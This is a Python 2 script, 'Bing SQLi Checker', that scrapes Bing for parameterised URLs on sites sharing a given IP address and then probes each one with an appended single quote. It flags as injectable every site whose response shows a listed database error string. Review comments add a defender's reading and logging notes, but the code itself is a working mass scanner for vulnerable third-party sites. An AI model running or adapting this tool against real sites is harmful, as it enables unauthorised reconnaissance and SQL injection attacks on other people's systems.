#!/usr/bin/env python
import urllib
import urllib2
import re, sys
import os, cookielib
import threading
import time
from IPy import IP # pip install IPy
# This script runs only on PHP websites
# Only error-based SQL injection is detected
def screen():
    """Clear the terminal: `cls` when os.name is "nt", `clear` otherwise."""
    # Both commands are fixed literals, so no user-controlled text reaches the shell.
    clear_cmd = 'cls' if os.name == "nt" else 'clear'
    os.system(clear_cmd)
# Runs at import time: clear the terminal before anything is printed.
screen()
# Start-up banner (tool name, version and author URL). The ASCII art has lost
# its original column alignment in this listing; the literal is kept as found.
banner = '''
____ _ ____ ___ _ _ ____ _ _
| __ )(_)_ __ __ _ / ___| / _ \| | (_) / ___| |__ ___ ___| | _____ _ __
| _ \| | '_ \ / _` | \___ \| | | | | | | | | | '_ \ / _ \/ __| |/ / _ \ '__|
| |_) | | | | | (_| | ___) | |_| | |___| | | |___| | | | __/ (__| < __/ |
|____/|_|_| |_|\__, | |____/ \__\_\_____|_| \____|_| |_|\___|\___|_|\_\___|_| v1.0
|___/
URL: http://blackcoder.info
'''
# Python 2 print statement; the whole file targets Python 2 (urllib2, raw_input).
print banner
# Prompt for the target and let IPy decide whether the text parses as an address.
try:
    ip = raw_input("Enter Target IP: ")
    # `host` is only a validity check and is not referenced again in this
    # listing; main() interpolates the raw string `ip`, not the parsed object.
    host = IP(ip)
except:
    # NOTE(review): the bare except also traps Ctrl-C / EOF at the prompt, and
    # sys.exit() without an argument reports status 0 even though input was rejected.
    for text in ("", "Enter Only IP-Address", ""):
        print(text)
    sys.exit()
def main():
    """Collect search-engine results for the module-level `ip` into sqlsites.txt.

    Requests Bing result pages for an `ip:<ip> id=` query at offsets
    1, 11, ..., 191, keeps every result link that contains `id=`, and writes
    the de-duplicated set to `sqlsites.txt` (one entry per line) via the
    scratch file `x.txt`, which is deleted at the end.

    Review notes:
      * No timeout is passed to urlopen, so a stalled response blocks the run.
      * Both files are opened in append mode with fixed names in the current
        directory, so leftovers from an earlier run are merged into this one.
      * If no link matched, `x.txt` was never created; the resulting error is
        printed by the handler below and `sqlsites.txt` is not written.
      * Any exception is printed and swallowed; the caller cannot tell a
        failed harvest from an empty one.
    """
    try:
        offset = 1
        while offset <= 200:
            # The URL is assembled from the same literal pieces as before;
            # `ip` is inserted as typed, without URL-encoding.
            bing = ("http://www.bing.com/search?q=ip%3A" + ip + "+"
                    + "id=&go=Submit&qs=n&form=QBLH&pq=" + "ip%3A" + "wordpress"
                    + "&first=" + str(offset) + "&FORM=PORE")
            offset += 10
            page = urllib2.urlopen(urllib2.Request(bing)).read()
            for anchor in re.findall('<h2><a href="\S+', page):
                # Strip the anchor markup (and an http:// scheme when present).
                target = anchor.replace('<h2><a href="http://', "").replace('<h2><a href="', "")
                if 'id=' not in target:
                    continue
                cleaned = target.replace('"', "").replace('amp;', "")
                with open('x.txt', 'a') as f:
                    f.write(cleaned)
                    f.write("\n")
        # De-duplicate through a set; output order is therefore arbitrary.
        unique = set(open("x.txt", 'r').read().splitlines())
        count = 0
        for line in unique:
            with open('sqlsites.txt', 'a') as sql:
                count += 1
                sql.write(line)
                sql.write("\n")
        print("")
        print("Total Sites: " + str(count))
        os.unlink("x.txt")
    except Exception as e:
        print(e)
# Runs at import time (there is no __main__ guard): the harvest phase must
# finish first because the probing phase further down reads sqlsites.txt.
main()
# Substrings that sqli() searches for in response bodies. Each one is a PHP
# function name or a database/driver error fragment, i.e. text that reaches a
# client only when the application echoes raw error output.
# Defender's reading: a page that can emit any of these has verbose error
# display enabled; turning that off and logging server-side removes the signal
# this list depends on, and parameterized queries remove the underlying flaw.
# "mysql_result" and "mysql_num_rows" appear twice; the duplicates are kept as found.
error = [
    "DB Error",
    "SQL syntax;",
    "mysql_fetch_assoc",
    "mysql_fetch_array",
    "mysql_num_rows",
    "is_writable",
    "mysql_result",
    "pg_exec",
    "mysql_result",
    "mysql_num_rows",
    "mysql_query",
    "pg_query",
    "System Error",
    "io_error",
    "privilege_not_granted",
    "getimagesize",
    "preg_match",
]
def sqli(f, opener):
    """Request `http://<f>'` and record `f` when the body contains an `error` entry.

    Args:
        f: one line from sqlsites.txt (host and path without the http:// prefix).
        opener: urllib2 opener supplied by the caller.

    On a match the URL (with every single quote removed) is printed and
    appended to SQLI.txt. Without a match `SQLI` is never bound, the write
    raises, and the blanket handler discards it, so nothing is recorded.

    What this looks like in a web server's logs, as the code stands:
      * a GET whose query string ends in a single `'`;
      * the same request repeated once per `error` entry until one matches,
        because the page is re-fetched inside the loop;
      * no User-Agent is set, so urllib2's default `Python-urllib/<version>`
        value is sent.

    NOTE(review): every failure (network, HTTP status, unbound name) is
    silenced by the except below, so errors are indistinguishable from misses.
    """
    try:
        probe_url = "http://" + f + "'"
        for signature in error:
            body = opener.open(urllib2.Request(probe_url)).read()
            if signature not in body:
                continue
            SQLI = probe_url.replace("'", "")
            print(SQLI)
            break
        # Runs from several threads at once; appends are not serialized.
        with open("SQLI.txt", 'a') as out:
            out.write(SQLI)
            out.write("\n")
    except Exception:
        pass
# Probing phase: one thread per harvested entry, started 0.3 s apart, all
# sharing a single opener and cookie jar. The thread count is unbounded; it
# equals the number of lines in sqlsites.txt.
# NOTE(review): if the harvest phase wrote nothing, sqlsites.txt does not
# exist and the open() below raises, ending the script with a traceback.
threads = []
files = open('sqlsites.txt', 'r').read().splitlines()
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
rule = "-" * 30
print(rule)
print("SQL-INJECTION SITES ")
print(rule)
for f in files:
    worker = threading.Thread(target=sqli, args=(f, opener))
    worker.start()
    threads.append(worker)
    time.sleep(0.3)
# Wait for every probe to finish before removing the input list.
for worker in threads:
    worker.join()
os.unlink('sqlsites.txt')
for trailer in ("", "Coded By Ne0-h4ck3r", ""):
    print(trailer)